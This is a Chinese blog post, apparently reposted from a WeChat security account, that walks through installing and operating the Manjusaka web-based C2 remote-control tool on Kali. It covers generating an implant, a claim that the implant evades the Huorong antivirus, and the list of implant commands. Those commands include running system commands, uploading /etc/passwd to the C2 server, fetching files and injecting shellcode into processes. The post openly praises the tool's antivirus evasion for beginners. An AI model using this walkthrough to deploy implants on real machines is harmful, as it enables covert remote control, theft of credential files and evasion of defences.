本文为大家推荐一款基于web界面的c2工具。
让我们一起来学习吧!
系统架构
在kali中安装
首先我们克隆项目地址到我们kali的本地环境。
git clone https://github.com/YDHCUI/manjusaka.git
chmod -R 777 manjusaka
#运行
./manjusaka
账号密码见初始日志,每个人生成的密码及默认路由都不一样。
然后,我们浏览器中访问http://ip:3200/manjusaka,便可以看到下面登录界面。则说明安装成功。
接下来,我们根据终端中提供的信息进行登录系统。
新建项目
创建项目,默认有一个公共项目,通过项目【状态】开关可以控制项目是否启用状态。选择当前项目后 可在回传结果里面查看当前项目回传的信息。当然,我们可以自己创建自己的项目,具体做法如下:点击全局设置–目标设置–新建项目
这里我们是内网环境,因此只填kali的IP地址。如果是公网服务器,可以填写公网IP。
生成shell
点击生成npc
点击下载生成的shell
对其进行木马查杀,完美过火绒。
运行后,目标成功上线。
填坑 默认监听80端口,建议在conf.toml文件中修改为其他端口。因为80端口早被其他应用如nginx占用。
点击激活,可在npc详情中显示相应的信息。
虚拟终端
常用的终端命令
help 打印帮助
ps 查看进程 eg: ps
ss 查看网络连接 eg: ss
ls 枚举文件 eg: ls /
cd 切换目录 eg: cd /
sh 执行系统命令 eg: sh ps -aux , sh tasklist
cat 读取文本 cat a.txt
screen 执行截屏 screen
wget 下载文件 eg: wget http://192.168.1.1/a.txt <a.txt> 文件名可选 默认当前
put 上传文件 eg: put /etc/passwd 将passwd文件上传到nps服务器
start 执行插件可执行文件 eg: start name <args> 需要可执行文件在plugins目录下 会自动把插件传到目标机器上面
pl 执行插件 eg: pl plugname <plugargs> 需要插件在plugins目录下
inject 注入进程 eg: inject pid <shellcodeurl> shellcodeurl可选 默认下载当前shellcode下载链接
文件管理
为了更好的展示,我们还可以通过流程图的形式进行展示。
总结
manjusaka工具是一款很棒的C2工具。尤其是在免杀这块,因为很多初学者在利用cs或者msf生成shell时,最头疼的问题也莫过于免杀了。同时manjusaka也支持自定义开发插件,灵活性也大大提高。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali笔记):一款基于Web界面的C2远控工具Manjusaka
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/178133.html
